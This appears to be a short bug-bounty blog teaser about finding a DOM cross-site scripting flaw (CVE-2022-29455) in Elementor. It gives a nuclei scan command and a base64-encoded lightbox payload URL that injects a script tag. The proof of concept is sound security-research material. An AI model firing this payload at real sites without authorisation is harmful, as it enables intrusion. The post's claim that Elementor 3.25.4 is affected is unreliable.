How I Found an Easy Dom xss.

5 hours ago 8
BOOK THIS SPACE FOR AD
ARTICLE AD

Learn how to find one of the easy bugs.

loyalonlytoday

Infosec Matrix

FREE LINK IN THE COMMENTS

BUGNAME: CVE : CVE-2022–29455. DOM CROSS SITE SCRIPTING.

In this blog, You will see how I found an easy dom xss.

Now let’s see.

After loading my target URL.

I checked which technologies are running on this domain using Wappalyzer.

in Wappalyzer I observed this website’s page builder is Elementor 3.25.4 is the version.

Screenshot by author

After I copied that URL I checked that URL in nuclei using nuclei templates.

nuclei -u yoururl -t /root/nuclei-templates/http/technologies/

And I confirmed the version using nuclei.

It’s time to exploit this.

https://yourtargeturl/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==

I entered this above payload in my target URL and clicked on enter.

Read Entire Article